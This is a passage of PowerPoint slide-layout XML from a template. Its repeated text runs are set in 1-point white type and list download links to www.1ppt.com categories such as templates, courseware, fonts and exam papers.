              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout118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18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18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18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1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19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19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19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19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19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19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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout119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19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19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19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2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20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20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20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20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20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20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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout120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20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20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20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2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21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21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21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21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21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21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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
